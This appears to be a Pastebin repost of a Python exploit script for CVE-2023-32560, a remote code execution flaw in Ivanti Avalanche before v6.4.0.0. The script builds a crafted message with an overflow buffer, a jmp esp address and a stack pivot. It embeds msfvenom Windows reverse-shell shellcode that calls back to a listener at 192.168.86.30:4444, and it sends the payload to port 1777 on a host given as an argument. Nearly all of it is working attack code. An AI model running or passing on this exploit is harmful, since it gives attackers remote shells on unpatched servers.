Advertisement
FlyFar

Ivanti Avalanche <v6.4.0.0 - Remote Code Execution - CVE-2023-32560

Jan 21st, 2024
950
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.01 KB | Cybersecurity | 0 0
  1. """
  2. Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
  3. Date: 2023-08-16
  4. Exploit Author: Robel Campbell (@RobelCampbell)
  5. Vendor Homepage: https://www.ivanti.com/
  6. Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
  7. Version: v6.4.0.0
  8. Tested on: Windows 11 21H2
  9. CVE: CVE-2023-32560
  10. Reference: https://www.tenable.com/security/research/tra-2023-27
  11. """
  12.  
  13. import socket
  14. import struct
  15. import sys
  16.  
  17. # Create an item structure for the header and payload
  18. class Item:
  19.     def __init__(self, type_, name, value):
  20.         self.type = type_
  21.         self.name = name.encode()
  22.         self.value = value
  23.         self.name_size = 0x5
  24.         self.value_size = 0x800
  25.  
  26.     def pack(self):
  27.         return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
  28.                            self.type, self.name_size, self.value_size, self.name, self.value)
  29.  
  30. # Create a header structure
  31. class HP:
  32.     def __init__(self, hdr, payload):
  33.         self.hdr = hdr
  34.         self.payload = payload
  35.         self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)
  36.  
  37.     def pack(self):
  38.         return b''.join([item.pack() for item in self.hdr]) + \
  39.                b''.join([item.pack() for item in self.payload]) + self.pad
  40.  
  41. # Create a preamble structure
  42. class Preamble:
  43.     def __init__(self, hp):
  44.         self.msg_size = len(hp.pack()) + 16
  45.         self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
  46.         self.payload_size = sum([len(item.pack()) for item in hp.payload])
  47.         self.unk = 0  # Unknown value
  48.  
  49.     def pack(self):
  50.         return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)
  51.  
  52. # Create a message structure
  53. class Msg:
  54.     def __init__(self, hp):
  55.         self.pre = Preamble(hp)
  56.         self.hdrpay = hp
  57.  
  58.     def pack(self):
  59.         return self.pre.pack() + self.hdrpay.pack()
  60.  
  61. # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
  62. shellcode =  b""
  63. shellcode += b"fce8820000006089e531c064"
  64. shellcode += b"8b50308b520c8b52148b7228"
  65. shellcode += b"0fb74a2631ffac3c617c022c"
  66. shellcode += b"20c1cf0d01c7e2f252578b52"
  67. shellcode += b"108b4a3c8b4c1178e34801d1"
  68. shellcode += b"518b592001d38b4918e33a49"
  69. shellcode += b"8b348b01d631ffacc1cf0d01"
  70. shellcode += b"c738e075f6037df83b7d2475"
  71. shellcode += b"e4588b582401d3668b0c4b8b"
  72. shellcode += b"581c01d38b048b01d0894424"
  73. shellcode += b"245b5b61595a51ffe05f5f5a"
  74. shellcode += b"8b12eb8d5d68333200006877"
  75. shellcode += b"73325f54684c772607ffd5b8"
  76. shellcode += b"9001000029c454506829806b"
  77. shellcode += b"00ffd5505050504050405068"
  78. shellcode += b"ea0fdfe0ffd5976a0568c0a8"
  79. shellcode += b"561e680200115c89e66a1056"
  80. shellcode += b"576899a57461ffd585c0740c"
  81. shellcode += b"ff4e0875ec68f0b5a256ffd5"
  82. shellcode += b"68636d640089e357575731f6"
  83. shellcode += b"6a125956e2fd66c744243c01"
  84. shellcode += b"018d442410c6004454505656"
  85. shellcode += b"5646564e565653566879cc3f"
  86. shellcode += b"86ffd589e04e5646ff306808"
  87. shellcode += b"871d60ffd5bbe01d2a0a68a6"
  88. shellcode += b"95bd9dffd53c067c0a80fbe0"
  89. shellcode += b"7505bb4713726f6a0053ffd5"
  90.  
  91. buf = b'90' * 340
  92. buf += b'812b4100' # jmp esp (0x00412b81)
  93. buf += b'90909090'
  94. buf += b'90909090'
  95. buf += shellcode
  96. buf += b'41' * 80
  97. buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
  98. buf += b'43' * (0x800 - len(buf))
  99.  
  100. buf2 = b'41' * 0x1000
  101.  
  102. # Create message payload
  103. hdr = [Item(3, "pwned", buf)]
  104. payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
  105. hp_instance = HP(hdr, payload)
  106. msg_instance = Msg(hp_instance)
  107.  
  108. # Default port
  109. port = 1777
  110.  
  111. # check for target host argument
  112. if len(sys.argv) > 1:
  113.     host = sys.argv[1]
  114. else:
  115.     print("Usage: python3 CVE-2023-32560.py <host ip>")
  116.     sys.exit()
  117.  
  118. with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
  119.     s.connect((host, port))
  120.     s.sendall(msg_instance.pack())
  121.     print("Message sent!")
  122.     s.close()
  123.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement